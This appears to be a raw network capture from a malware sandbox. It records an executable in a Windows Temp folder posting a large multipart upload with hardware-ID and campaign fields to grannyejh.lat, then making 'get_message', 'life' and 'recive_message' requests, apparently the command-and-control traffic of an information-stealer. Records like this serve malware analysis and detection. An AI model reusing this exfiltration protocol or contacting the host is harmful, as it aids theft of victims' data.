2024-12-18 12:38:56 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WCOVD8AF2KFED User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 584643 Host: grannyejh.lat
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: 2d 2d 57 43 4f 56 44 38 41 46 32 4b 46 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 0d 0a 2d 2d 57 43 4f 56 44 38 41 46 32 4b 46 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 43 4f 56 44 38 41 46 32 4b 46 45 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 0d 0a 2d 2d 57 43 4f 56 44 38 Data Ascii: --WCOVD8AF2KFEDContent-Disposition: form-data; name="hwid"59DA74536B732CCB00D57F9DDD37BE0C--WCOVD8AF2KFEDContent-Disposition: form-data; name="pid"1--WCOVD8AF2KFEDContent-Disposition: form-data; name="lid"yau6Na--6989783370--WCOVD8
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: 61 29 12 a6 48 ea 91 6d 35 8c 44 ba 1d d8 5c 29 37 b8 c2 34 5f d9 4f ae de 39 3e fc 0e 5d 2a eb f1 cc 47 e3 0e cb d3 0c dc 24 18 66 63 62 17 52 68 92 67 4a 1c d4 d5 3d 85 e3 47 fb 22 30 d7 89 d2 ed 87 1d 19 28 62 d7 e4 d7 f3 a8 2b 49 a3 4a e8 0e 82 6e 6f 94 0b 16 c6 f7 ad 5d 71 00 94 80 b9 68 f9 be e7 c1 9a de ca ab 47 c3 fa 4b ce ca 40 ac 84 b5 99 37 3b 2b 75 f1 b3 c1 9c 3e fc 72 c0 8c a7 36 0d b0 4a c4 7e 35 3c 14 db 84 fc dc 55 b0 4d 8f ed d9 aa 30 fb 02 07 72 d2 50 34 b4 10 c5 7f 09 55 db 8a ac c9 08 df 88 00 5b 2a 32 22 e1 ac a9 d2 c3 13 a8 a9 6c cc ff b3 c9 09 79 90 05 46 3f 3c 41 10 1a d4 53 fe db 01 d3 8e 83 45 e8 6a ee 59 51 d1 65 d6 b3 9d 59 ef 44 20 e1 df 64 b3 3b 56 2c a1 20 6b 9b 57 21 a0 2b 8a f9 e0 c0 ab af cd f9 fa 68 d8 83 1b 9a 97 ad 97 Data Ascii: a)Hm5D\)74_O9>]G$fcbRhgJ=G"0(b+IJno]qhGK@7;+u>r6J~5<UM0rP4U[2"lyF?<ASEjYQeYD d;V, kW!+h
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: fa b9 9e 37 cc 09 92 8a 3a 5b c4 da 14 e1 52 b6 55 14 05 ca f0 1d 69 0f 3b 47 22 a5 1e 99 e9 f9 3b 45 61 4f 49 dc c6 a2 74 06 0c 0f 54 ef 0e 1e de fe a4 b8 c8 25 2e a6 f4 e9 5b 4d 8e b7 a8 99 a6 66 5b 70 37 ea 16 4a b7 91 48 db 96 04 c5 7b 57 a7 48 d1 6b ab c1 f2 2e 3f 35 ca 41 0b 02 d6 3f 9e 7e 72 f9 61 b6 24 d2 6f 52 03 05 a7 1c e8 07 41 e1 86 bb 22 0a 31 91 27 d7 87 57 0d 7b 93 0d 35 fd 46 07 f8 a7 83 17 be 19 56 dc bf 54 fe 59 b0 6a 58 1d c8 6d 7a df 5c c7 da ac 8a a6 d1 aa 6f 6a 57 f4 66 fa 8d 9c e2 a4 7b 24 fb 7d c6 ea 84 e6 ce de c3 db cf 3c 83 39 2f c4 80 eb ca 1a cf 0f 03 68 53 c6 fe 9c ca 21 e1 57 f6 80 68 4e dc a4 1a c8 1b cf 2b 86 00 55 07 ae ba 54 57 b5 0b 84 2c ee 20 00 bc fd 9f 5b a0 01 0a d2 4d fa f0 70 44 4e 65 3f 1a 8e 21 80 fb b2 51 8b Data Ascii: 7:[RUi;G";EaOItT%.[Mf[p7JH{WHk.?5A?~ra$oRA"1'W{5FVTYjXmz\ojWf{$}<9/hS!WhN+UTW, [MpDNe?!Q
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: 4f bb 6b a8 e8 87 8e ba 5c e8 6c 19 97 5d 94 62 2d c5 11 02 53 f8 d5 81 a1 4a bf bd cc f6 be 9f ba 09 7e e0 d9 46 d7 c1 16 10 32 17 b4 31 1f 35 e3 56 b3 8c 69 c9 e3 2e 1f 15 a6 f7 a3 bf 70 f3 ba b9 42 cb eb f9 dc 20 c4 42 dd 56 57 7a 46 68 4e 0b 84 cd 51 2c 76 5a 4b 3f f6 f5 4a 1d 1c 59 e9 86 6e cc 8a b9 d7 71 2e 43 be 53 fa cf 1e 84 9b 10 fd ce 1f 70 79 87 0f f4 85 53 0f 63 cb ca 91 74 ab 71 d4 1d 9e 17 d2 76 6b 37 44 37 5b 1c bc f8 e7 e4 85 86 c4 b8 97 d8 76 09 b3 e0 95 f9 f4 3f 7a 62 20 a1 67 7d 51 0e 5c 6e eb 12 02 8f 3f 71 05 d6 35 db dc 5e da b4 45 18 87 be 72 c4 10 d0 04 ec e7 2c 67 21 ec 1b d3 42 42 f4 9d 23 a6 85 f9 62 bb cf 8a 99 f0 8c d6 68 e9 d1 ba 4a fa 45 90 55 ce c6 02 f1 95 a1 dc 43 c6 6f a4 41 bb 56 fa b6 1b 0f 26 22 9e 2f 4a 7e 1d 80 2f Data Ascii: Ok\l]b-SJ~F215Vi.pB BVWzFhNQ,vZK?JYnq.CSpySctqvk7D7[v?zb g}Q\n?q5^Er,g!BB#bhJEUCoAV&"/J~/
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: 28 96 92 78 98 6c 06 4b 6f 75 e8 68 40 8a c6 e9 e5 5b 7e 5e 7a d7 05 10 72 32 1f b3 22 4c 0c 19 17 5d f4 50 fc cb ed e8 dc 2b aa 29 59 49 85 49 36 94 cd bf df 1e c9 27 7a 81 8b 4d c9 5d ac b7 5e 35 51 91 71 e2 3b a5 de 20 db 1e 87 b6 ad f2 0a 4c ff bd 59 ea 5b 4d 4f e4 b1 16 18 f7 18 ac c6 71 38 c7 c7 d9 1e f1 4c 8d 0e c7 c6 6d 1d 00 a3 86 72 54 fc 38 40 70 54 c4 76 77 8f b4 10 2d e4 c3 e3 36 af a4 33 fc b8 7b 34 28 0f 12 17 44 47 bf 8b 58 48 2a 9e 60 35 ea 52 0f e8 a1 bc 7c 0b 1b 6e f9 4b 64 3a e2 3e 2d 98 cc 55 da b8 de ca 35 88 c2 27 0e b6 21 44 f4 20 d3 77 35 bd 66 0e 96 03 77 a3 42 a6 66 8a be 55 67 c7 16 e8 21 bd 1c ba a9 07 e3 59 97 31 0a e1 e9 08 92 6c 51 09 7a 57 54 d8 65 84 09 26 fb 98 d0 78 09 6a da 48 7c b3 67 73 f9 dd 74 9b d9 df 5a ad 6f 35 Data Ascii: (xlKouh@[~^zr2"L]P+)YII6'zM]^5Qq; LY[MOq8LmrT8@pTvw-63{4(DGXH*`5R\|nKd:>-U5'!D w5fwBfUg!Y1lQzWTe&xjH\|gstZo5
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: 11 05 77 8b 0a 72 3d 74 46 1b d2 e0 39 5d f2 01 73 2a bc fe a2 0b e9 2c f3 8b b8 f8 4f f6 8f ff e2 9e 15 2b 83 6c 8d 3a 19 74 c9 32 c9 72 38 e4 3a ae 40 e1 d9 b2 2d 0f d0 5e 45 b4 b9 c1 35 27 4c 9b cd ab fb 25 95 51 6b 1a 94 f1 b9 42 21 ee 62 95 65 15 2f 09 67 58 4d d4 2d e8 c7 5c b3 e3 3f 8a 71 cd 24 49 70 63 84 a8 5d 38 da 25 89 57 e3 46 3b 57 ea a0 eb e7 31 d4 e4 86 30 3f 05 d2 eb be c8 25 4d ed 1f 9a b8 e5 75 6f 4d 1e 72 79 ef 79 dc 5d e6 b9 45 70 4d 40 6a 29 ff 6e 03 02 83 f8 b7 f8 ed e9 eb 8a ea 88 0e 1e 52 74 84 d8 46 77 bf 05 c3 02 60 db 9b 42 ff 0e a7 c6 dd 5f bb 35 94 fc 5b 51 06 53 b2 33 7d 83 f9 48 53 e0 af e1 30 df 59 11 ca 81 ca 89 21 02 3a 84 6f 59 8f d0 5e 47 f0 13 fc b0 ad d9 b5 d7 a3 cd ed a1 96 ca 37 ef 2d 25 be 78 69 b8 47 a4 d9 35 3a Data Ascii: wr=tF9]s*,O+l:t2r8:@-^E5'L%QkB!be/gXM-\?q$Ipc]8%WF;W10?%MuoMryy]EpM@j)nRtFw`B_5[QS3}HS0Y!:oY^G7-%xiG5:
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: ec 97 58 57 84 d3 6a 79 27 0e 48 98 ef dc fc 25 04 fc 85 f9 fe 77 83 cb 8f 54 b8 ea 11 10 86 a8 0c 68 67 c0 00 66 8e 8f ea 9c 8d 7a 33 8c 2d c8 c3 28 b9 40 00 d5 65 2e 60 a7 94 81 86 75 64 72 83 33 2f c1 c7 df 2a 72 f9 98 e1 92 a6 a6 6a fc 25 b2 2f d2 0c 15 b1 40 7b d9 7c 7b bf a8 9c 2a d4 c1 c8 f7 e3 1c 30 12 d0 e7 88 e1 0e f3 78 0c 86 fe d9 ea b4 2c 30 40 05 9d 71 c9 1c 0e 58 45 5d 1f 49 6f dd b8 7a e4 d9 21 67 34 cc 87 86 00 2f 0b 0b ca 62 d5 ae d6 f4 f4 37 e9 ef dc 2e ce a0 d5 92 66 be ab e4 16 b6 9a 98 68 4b e4 1e 22 25 20 62 33 48 cd c6 6e 57 1b f6 b3 48 13 9a 3b e9 8a 35 f6 d5 5b bc 04 10 9d 74 59 70 1e e1 16 1e 94 e7 b2 c5 c8 29 ca 27 31 c6 cd e5 58 03 a6 43 3f 26 cf 1b 2d 8a e0 93 2b fa ad 24 84 55 d8 22 bd fb 96 0c 92 ce 10 30 eb a8 95 f7 6a b8 Data Ascii: XWjy'H%wThgfz3-(@e.`udr3/rj%/@{\|{0x,0@qXE]Ioz!g4/b7.fhK"% b3HnWH;5[tYp)'1XC?&-+$U"0j
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: ff f4 a3 35 02 37 7d 8e 96 cc bd 53 2e bc 44 ea d2 16 56 66 33 7a bf 4c be 58 09 60 ec 05 af cc 50 e7 8b 29 c2 6f f3 03 59 76 2d bb 58 21 c1 3a 91 bf f6 ae 44 54 73 df 96 9f 5a 1f ff 2c 09 f0 d6 bf a2 14 7a 59 8b d9 b5 dc 4f d9 fc 33 72 3a 1f d7 f3 ae 08 d6 60 d7 9d bd 61 69 dc 54 14 3c 10 94 e2 fd 0c fd 6f 50 cb c7 1d 42 23 e1 46 2b 30 da 3f c1 48 1e 51 91 ad e4 4d ad f0 ea 2b 5b 1e f6 02 98 65 fa 7e c5 83 9f 1a f6 6b 82 64 b6 8d af d5 d7 ad c3 98 40 24 ed ba 28 43 64 76 7e 86 71 b2 b6 25 9a 42 12 16 f6 57 cc 16 2e f1 6c 77 08 4e 37 04 c1 cb 1e 11 65 e5 37 5d 75 97 86 fc 1a 36 80 c8 89 40 1e 23 a5 65 a9 4a 4a c0 95 33 df c0 b0 6d 7e 6f 82 4b 61 8c 57 76 6c 25 5c 05 ec 96 ce aa 9d 83 5c 92 a0 c9 50 2e 92 32 eb 55 13 ca 37 51 59 1a 6e b9 13 17 76 ea fa 80 Data Ascii: 57}S.DVf3zLX`P)oYv-X!:DTsZ,zYO3r:`aiT<oPB#F+0?HQM+[e~kd@$(Cdv~q%BW.lwN7e7]u6@#eJJ3m~oKaWvl%\\P.2U7QYnv
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: 53 76 f8 f1 9e 8b 17 9c b0 4a 9b e7 17 e9 d5 19 a3 a6 8c 7f ba d1 40 b8 12 6f f3 8f 9d 5e 02 ed 17 a3 cb ee c3 f9 01 98 1d db da 56 18 f1 f8 f9 d3 01 22 06 17 81 39 e7 13 95 b8 f6 c1 94 5a cf d4 1f ff 34 7f 7c d0 1a eb 37 df 94 4e 9d 9e df 83 a9 75 a6 24 a2 f6 a0 9a 56 18 4a 52 4b be b4 bf 80 d7 97 b8 83 e1 a2 6b 86 e8 d6 bc fd 91 55 6b fd 0e 90 2e ba ad f6 56 a1 80 7e 5c 2f 3e 8c 58 4d 43 f0 0d db 4e 15 5e 47 89 cb 11 6b a6 90 e0 96 1e 8f f5 eb 41 a5 47 c1 de 82 ef 8e ba 59 55 db 04 05 f6 f6 bc e5 d3 b0 08 f8 ba d2 a0 5f ca c7 a3 4f 83 c7 bb 68 3e eb 27 a4 45 be aa 2a 1e a2 1c de 43 2f df 08 c7 84 1b 7f d3 95 5b d9 bc b7 ad 02 01 73 96 b7 1e 3b cc 4c 5f ef d1 85 29 cd 68 95 ce 2c 5f ca 09 d4 d7 cb fd 2c 03 ac dd ae 42 cc a2 59 09 27 3a cf 42 59 78 e4 b3 Data Ascii: SvJ@o^V"9Z4\|7Nu$VJRKkUk.V~\/>XMCN^GkAGYU_Oh>'E*C/[s;L_)h,_,BY':BYx
2024-12-18 12:38:56 UTC	15331	OUT	Data Raw: 50 de 50 b3 c7 fd c3 d8 0f 6a d5 79 e6 00 bf d3 6a 91 a1 dc 19 83 1f f5 1f bb 32 6f cd ea e4 f9 cb 3d ef 98 31 c4 2e be 4c 8f fe 9e ec 10 10 74 62 b5 92 b9 95 57 d5 a1 f3 c9 31 6b 6e 21 6b e5 1d 69 c2 d3 4a db c4 28 c8 31 00 2e bc f6 6b db be a3 05 94 e4 5e 5f ac 10 cd de ce 46 24 3a ec 36 5b 64 0c fa 25 ba b3 a6 4f 8e cf 60 ae b5 2e 78 b1 45 90 68 e7 2b 12 aa 8c 0d 9e 82 47 8b 7f 06 b1 e4 58 57 bf a6 66 2e 4d 9e 01 07 83 2c 5e 72 82 75 80 1c a3 d9 90 5c 95 fd 38 ec 05 02 23 07 64 87 c7 63 67 75 2f 54 ef 2c d8 08 92 9e 34 c4 e0 17 fa 9a 4b ea 5d 30 07 a0 01 fa 67 bf d9 d5 1c b9 3f 0c df 8f e7 c6 af 8f 3b 55 2c e8 ed 4a 82 b6 2d 7d fb e1 2e 13 f9 d0 64 81 61 fa 00 a6 4c c8 fd 84 e5 9d 05 a2 19 bf 33 e0 48 97 35 39 28 2b 0e 66 0f df 55 d1 5f 41 7e 78 2d 1d Data Ascii: PPjyj2o=1.LtbW1kn!kiJ(1.k^_F$:6[d%O`.xEh+GXWf.M,^ru\8#dcgu/T,4K]0g?;U,J-}.daL3H59(+fU_A~x-
2024-12-18 12:38:59 UTC	1041	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:38:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0bjpeh2b92fnnt1elk0gku1v28; expires=Sun, 13-Apr-2025 06:25:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPlfUGQRsPiCBc6DnksENyZ4SGPkPqjo%2BfBus4IPDtA%2B%2Br5Ecp8ofulEp%2BTZW31vwjKIQ2UsEGRFnvXN8zmhyzC4g4FSgooilwGfFUyk6D0R9KV%2FZPgsz2StIEpckXka"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f367d5c9b440e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2580&min_rtt=2119&rtt_var=1124&sent=300&recv=607&lost=0&retrans=0&sent_bytes=2830&recv_bytes=587226&delivery_rate=1378008&cwnd=234&unsent_bytes=0&cid=89619197e0d11307&ts=2400&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49732	104.21.64.80	443	6704	C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:39:00 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: grannyejh.lat
2024-12-18 12:39:00 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d 26 68 77 69 64 3d 35 39 44 41 37 34 35 33 36 42 37 33 32 43 43 42 30 30 44 35 37 46 39 44 44 44 33 37 42 45 30 43 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6989783370&j=&hwid=59DA74536B732CCB00D57F9DDD37BE0C
2024-12-18 12:39:01 UTC	1032	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:39:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ltme17itb4n1ntsapahm74p3t8; expires=Sun, 13-Apr-2025 06:25:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Okmm3ayQy111cUAOUzMewzvbcpUkpKTUj9Kw22dv0f%2FRqfyU6aA%2FHbe%2FVpx92ASnqTZnzM%2FgUwdgpZcq%2FBnSas5op0I6tYMu4qcZklHQmrtVlVaerdsgBtAaQO4DYiMz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f36955af178dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1801&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=984&delivery_rate=1580086&cwnd=174&unsent_bytes=0&cid=6a2a39cece5ab7ba&ts=730&x=0"
2024-12-18 12:39:01 UTC	54	IN	Data Raw: 33 30 0d 0a 71 30 43 43 44 73 76 44 62 6e 41 54 2b 30 75 6f 2b 4f 77 33 6c 72 50 6f 30 67 41 6f 2f 57 59 72 62 6e 72 59 65 4d 52 78 46 79 72 77 48 51 3d 3d 0d 0a Data Ascii: 30q0CCDsvDbnAT+0uo+Ow3lrPo0gAo/WYrbnrYeMRxFyrwHQ==
2024-12-18 12:39:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.8	50097	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:42:55 UTC	260	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: grannyejh.lat
2024-12-18 12:42:55 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 12:42:58 UTC	1027	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6ogtuc87ksat9usrokc1mvktp2; expires=Sun, 13-Apr-2025 06:29:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8l%2FhlRQoKBAlmftiBYOIjMsjw41ySC7r31RE91R0Lf9F7vxthTx16h7RgyMwVs7gSqxttHR%2BkORb5DykGnB9wD3TyNKJkn37lecHGliOb2hvnrKtnnlVJkVjoNtjVt7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3c50898e8c99-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1786&rtt_var=691&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1558164&cwnd=247&unsent_bytes=0&cid=adf4d1e5fd82ee97&ts=2864&x=0"
2024-12-18 12:42:58 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 12:42:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.8	50099	104.21.64.80	443

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:42:59 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: grannyejh.lat
2024-12-18 12:42:59 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 38 39 37 38 33 33 37 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6989783370&j=
2024-12-18 12:43:03 UTC	1031	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rmj808ldqa1lscmkhlh5ig5fhv; expires=Sun, 13-Apr-2025 06:29:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=91LKHBEGKBiSErA7wNKDKS1pgSQ0UzNFuL1WmdQ%2F1YXpiWfhGKs6yqMWEkmAciebFLNCLy%2Ff%2FBDU9IYU61wZ%2BQipO6FPUv2yrrNiRFA3RLRBwhNd6dEPXAJptrfW60Sx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3c6b1f158ca7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1812&rtt_var=708&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=949&delivery_rate=1514522&cwnd=128&unsent_bytes=0&cid=273b1a57e5b737b3&ts=4039&x=0"
2024-12-18 12:43:03 UTC	338	IN	Data Raw: 31 64 32 63 0d 0a 72 57 49 6f 2b 79 5a 48 33 49 43 69 49 61 6b 50 75 64 79 78 33 64 72 77 6f 6e 4a 62 43 69 54 42 42 70 6f 32 66 4b 79 6d 46 73 62 57 51 46 37 5a 48 48 50 77 6f 74 46 45 69 7a 58 4e 72 73 53 34 39 74 4c 44 46 6e 6b 77 51 71 42 71 36 56 4e 51 6a 74 42 37 35 4a 63 45 53 5a 64 56 49 76 43 69 78 31 6d 4c 4e 65 4b 6e 6b 37 69 30 30 70 68 51 50 6d 42 47 6f 47 72 34 56 78 66 44 31 6e 71 6c 78 51 35 50 6b 30 4d 6b 75 4f 48 4f 54 4d 78 71 33 4c 33 62 73 37 4f 64 79 68 39 35 4a 67 61 6b 66 4c 67 4d 58 75 48 44 59 71 66 67 41 31 75 51 42 44 72 77 2b 34 42 45 78 79 32 44 2f 74 43 34 75 4a 7a 45 46 6a 42 69 54 4b 6c 69 2b 56 49 57 33 4d 39 77 72 73 55 41 54 4a 4a 4a 4c 61 7a 73 78 45 76 48 62 4e 61 39 6b 2f 48 34 6c 64 68 51 59 53 67 56 6b 57 66 70 52 Data Ascii: 1d2crWIo+yZH3ICiIakPudyx3drwonJbCiTBBpo2fKymFsbWQF7ZHHPwotFEizXNrsS49tLDFnkwQqBq6VNQjtB75JcESZdVIvCix1mLNeKnk7i00phQPmBGoGr4VxfD1nqlxQ5Pk0MkuOHOTMxq3L3bs7Odyh95JgakfLgMXuHDYqfgA1uQBDrw+4BExy2D/tC4uJzEFjBiTKli+VIW3M9wrsUATJJJLazsxEvHbNa9k/H4ldhQYSgVkWfpR
2024-12-18 12:43:03 UTC	1369	IN	Data Raw: 35 78 6f 48 6a 73 4e 34 35 4a 64 41 54 4a 64 46 4b 4c 37 77 79 45 6a 41 61 4d 6d 31 32 72 4b 31 6b 73 30 61 4e 6d 74 47 70 47 37 79 57 78 54 4b 79 58 6d 69 7a 77 41 4b 31 77 51 69 70 71 4b 59 41 2b 68 6f 79 37 6e 66 71 66 71 6f 67 41 39 33 63 51 61 6b 61 4c 67 4d 58 73 62 42 64 36 66 45 44 30 6d 52 54 7a 65 2b 38 4d 5a 4f 7a 6e 2f 64 75 39 32 31 75 34 44 4b 48 6a 39 72 54 36 68 74 2f 56 4d 61 6a 6f 6f 30 6f 39 64 41 45 74 6c 6c 4b 4c 58 75 79 6c 54 4c 4c 63 54 77 79 76 2b 2f 6e 6f 42 49 65 57 78 48 70 32 58 38 57 68 44 4b 79 48 4b 71 77 67 39 4d 6b 30 51 69 74 4f 72 49 51 73 5a 6d 31 4c 37 57 73 72 79 55 7a 42 45 38 4b 41 6a 6a 59 2b 41 55 52 6f 37 71 63 36 66 64 51 6e 2b 61 53 69 75 35 39 49 42 63 68 58 53 62 75 64 2f 2f 34 4e 4c 4f 46 54 5a 36 52 37 46 Data Ascii: 5xoHjsN45JdATJdFKL7wyEjAaMm12rK1ks0aNmtGpG7yWxTKyXmizwAK1wQipqKYA+hoy7nfqfqogA93cQakaLgMXsbBd6fED0mRTze+8MZOzn/du921u4DKHj9rT6ht/VMajoo0o9dAEtllKLXuylTLLcTwyv+/noBIeWxHp2X8WhDKyHKqwg9Mk0QitOrIQsZm1L7WsryUzBE8KAjjY+AURo7qc6fdQn+aSiu59IBchXSbud//4NLOFTZ6R7F
2024-12-18 12:43:03 UTC	1369	IN	Data Raw: 70 61 45 52 62 50 45 51 6e 2b 61 53 69 75 35 39 49 42 63 68 58 53 62 75 64 2f 2f 34 4e 4c 4e 47 44 78 74 53 61 4a 75 39 6c 45 55 77 73 78 36 70 39 30 50 54 70 6c 49 4c 62 54 76 7a 6b 66 44 5a 4e 43 31 31 62 2b 35 6d 49 42 65 65 57 39 65 34 7a 79 34 59 42 6e 43 79 58 76 6d 2b 67 4e 45 6c 30 4d 7a 2f 76 32 4f 57 6f 74 71 31 2f 36 4c 2f 37 53 62 77 42 73 7a 62 45 61 6b 61 66 31 58 47 63 33 4a 63 36 37 42 42 30 36 56 54 53 69 34 34 73 64 48 7a 6e 2f 65 74 39 2b 7a 2b 4e 79 41 46 79 45 6f 48 75 4e 4c 2f 30 49 64 34 63 64 6c 72 59 38 66 42 49 41 45 49 72 4b 69 6d 41 50 4d 61 4e 4f 31 31 62 65 34 67 4d 55 65 4d 6d 6c 4d 70 57 58 31 57 42 6a 4f 78 58 53 69 77 77 42 4e 6e 6c 59 33 75 2b 54 53 53 59 73 6a 6d 37 6e 4c 2f 2b 44 53 39 67 41 75 65 56 44 68 55 66 74 61 Data Ascii: paERbPEQn+aSiu59IBchXSbud//4NLNGDxtSaJu9lEUwsx6p90PTplILbTvzkfDZNC11b+5mIBeeW9e4zy4YBnCyXvm+gNEl0Mz/v2OWotq1/6L/7SbwBszbEakaf1XGc3Jc67BB06VTSi44sdHzn/et9+z+NyAFyEoHuNL/0Id4cdlrY8fBIAEIrKimAPMaNO11be4gMUeMmlMpWX1WBjOxXSiwwBNnlY3u+TSSYsjm7nL/+DS9gAueVDhUfta
